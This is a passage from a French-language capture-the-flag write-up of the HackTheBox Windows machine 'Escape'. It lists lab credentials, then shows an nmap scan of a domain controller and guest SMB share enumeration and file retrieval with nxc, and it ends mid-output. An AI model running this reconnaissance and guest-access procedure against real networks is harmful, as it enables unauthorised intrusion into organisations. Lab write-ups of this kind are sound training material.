https://leopoldabgn.github.io/writeups/tags/windows/Recent content in Windows on sl0wguy's BlogHugo -- gohugo.ioen-usWed, 10 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/escape-htb/Wed, 10 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/escape-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Escape cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Escape</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.202</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># SQL Server</span> </span></span><span class="line"><span class="cl">PublicUser : GuestUserCantWrite1 </span></span><span class="line"><span class="cl">sql_svc : REGGIE1234ronnie </span></span><span class="line"><span class="cl">Ryan.cooper : NuclearMosquito3 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.202 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-10 22:21:01Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:34+00:00<span class="p">;</span> +7h59m59s from scanner time. </span></span><span class="line"><span class="cl">1433/tcp open ms-sql-s syn-ack ttl <span class="m">127</span> Microsoft SQL Server <span class="m">2019</span> 15.00.2000.00<span class="p">;</span> RTM </span></span><span class="line"><span class="cl"><span class="p">|</span>_ms-sql-info: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>SSL_Self_Signed_Fallback </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>SSL_Self_Signed_Fallback </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2025-09-10T22:17:26 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2055-09-10T22:17:26 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 8f5d163bc1ef9dbb2b789cdf2d7b5a90 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 6c89bf0840566f823a006405fce65a4f0570de19 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIDADCCAeigAwIBAgIQfAGJqsgHZopA2ARCvdHiZTANBgkqhkiG9w0BAQsFADA7 </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">JfvGOQ</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ms-sql-ntlm-info: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:34+00:00<span class="p">;</span> +7h59m59s from scanner time. </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49687/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49688/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49706/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49709/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2025-09-10T22:21:54 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span> p2p-conficker: </span></span><span class="line"><span class="cl"><span class="p">|</span> Checking <span class="k">for</span> Conficker.C or higher... </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">1</span> <span class="o">(</span>port 63970/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">2</span> <span class="o">(</span>port 24393/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">3</span> <span class="o">(</span>port 50586/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">4</span> <span class="o">(</span>port 24268/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 0/4 checks are positive: Host is CLEAN or ports are blocked </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 311: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb-share-enumeration---guest">SMB Share ENumeration - guest </h3><p>A l&rsquo;aide de l&rsquo;utilisateur <strong>guest</strong> et sans mot de passe, on réussi à lister les SMB SHARES. Le share <strong>Public</strong> est accessible en lecture.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Public READ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC SYSVOL Logon server share </span></span></code></pre></td></tr></table> </div> </div><h3 id="public-share---sql-server-procedurespdf">Public Share - &ldquo;SQL Server Procedures.pdf&rdquo; </h3><p>On trouve un fichier &ldquo;SQL Server Procedures.pdf&rdquo; dans le share <strong>Public</strong> à l&rsquo;aide de l&rsquo;utilisateur <strong>guest</strong>. J&rsquo;utilise ici uniquement <strong>nxc</strong> pour extraire le fichier.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> -M spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Started module spidering_plus with the following options: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> DOWNLOAD_FLAG: False </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> STATS_FLAG: True </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_FILTER: <span class="o">[</span><span class="s1">&#39;print$&#39;</span>, <span class="s1">&#39;ipc$&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_EXTS: <span class="o">[</span><span class="s1">&#39;ico&#39;</span>, <span class="s1">&#39;lnk&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> MAX_FILE_SIZE: <span class="m">50</span> KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Public READ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC SYSVOL Logon server share </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> Saved share-file metadata to <span class="s2">&#34;/root/.nxc/modules/nxc_spider_plus/10.10.11.202.json&#34;</span>. </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Shares: <span class="m">6</span> <span class="o">(</span>ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Readable Shares: <span class="m">2</span> <span class="o">(</span>IPC$, Public<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Filtered Shares: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total folders found: <span class="m">0</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total files found: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size average: 48.39 KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size min: 48.39 KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size max: 48.39 KB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.202.json </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Public&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-11-19 12:50:54&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-11-17 20:47:32&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-11-19 12:51:25&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;48.39 KB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --get-file <span class="s2">&#34;\\SQL Server Procedures.pdf&#34;</span> <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> --share Public </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> 